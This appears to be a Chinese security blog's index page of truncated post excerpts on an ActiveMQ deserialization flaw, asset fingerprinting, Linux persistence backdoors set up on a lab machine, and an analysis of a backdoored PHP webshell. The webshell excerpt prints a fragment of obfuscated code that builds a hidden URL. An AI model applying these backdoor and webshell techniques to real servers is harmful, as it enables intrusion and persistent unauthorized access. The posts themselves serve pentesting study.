W小哥

1.Apache的一款JAVA开源消息中间件，支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。 1.Apache ActiveMQ < 5.13.0 之前 5.1.漏洞没有限制在代理中序列化的类，远程攻击者可以借助特制的序列化的Java消息服务（J...

最近 EHole 更新了3.0版本，提供了 finger 与 fofaext 参数，fofaext参数主要从fofa进行批量获取 IP 的端口情况，而 finger 则进行批量进行指纹验证识别。EHole(棱洞)2.0提供了两种指纹识别方式，可从本地读取识别，也可以从FOFA进行...

前提条件： 假设在攻击的过程中通过利用各种getshell，已经拿到目标服务器root权限 靶机 IP： 192.168.241.142 （Ubuntu 20.04） 攻击IP： 192.168.241.查看 Ubuntu 20.04 的 vim 支持情况： 可以得知 vim 支...

PHP编程： Sublime Text、phpstorm 编码： utf-8 SQL： mysql 使用 bootstrap 框架 环境搭建： PHP study（PHP 5.3.3.网站结构如下图所示： 网站使用视频链接，在B站： https://www.bilibili.

alias 命令的功能： 为命令设置别名。注意： 对于通过ssh远程登录的用户来说，每次设置只在本次连接过程中有效，下次再进行登录的时候就不会这样了。2.2.2.在 ~/.cat ~/.同时，普通账户也存在 .注意： 系统启动默认加载的配置文件，比如：/etc/profile 、...

第一步： 查看 php 大马的源码，惊奇的发现这代码也太少了吧，而且登录大马之后的功能还很多，代码这么少肯定有问题。 $p="";$i="c".$p."h".$p."r".$d=$i(104).$p.$i(116).$p.$i(116).$p.$i(112).$p.$i(58)....

gzinflate+base64-jm.$File = 'jiemi.浏览器访问一下 http://127.0.0.1/gzinflate+base64-jm.php 解密文件之后，在同目录下生成解密之后的文件 jiemi.php 查看 jiemi.php 文件，代码内容还很多。...

下载链接：https://download.csdn.收集整理在知X星球，可加入知X星球进行查看。

SSH（Secure Shell）是一套协议标准，可以用来实现两台机器之间的安全登录以及安全的数据传送，其保证数据安全的原理是非对称加密。SSH 是目前较可靠，专为远程登录会话和其他网络服务提供安全性的协议，主要用于给远程登录会话数据进行加密，保证数据传输的安全。 危害： SSH...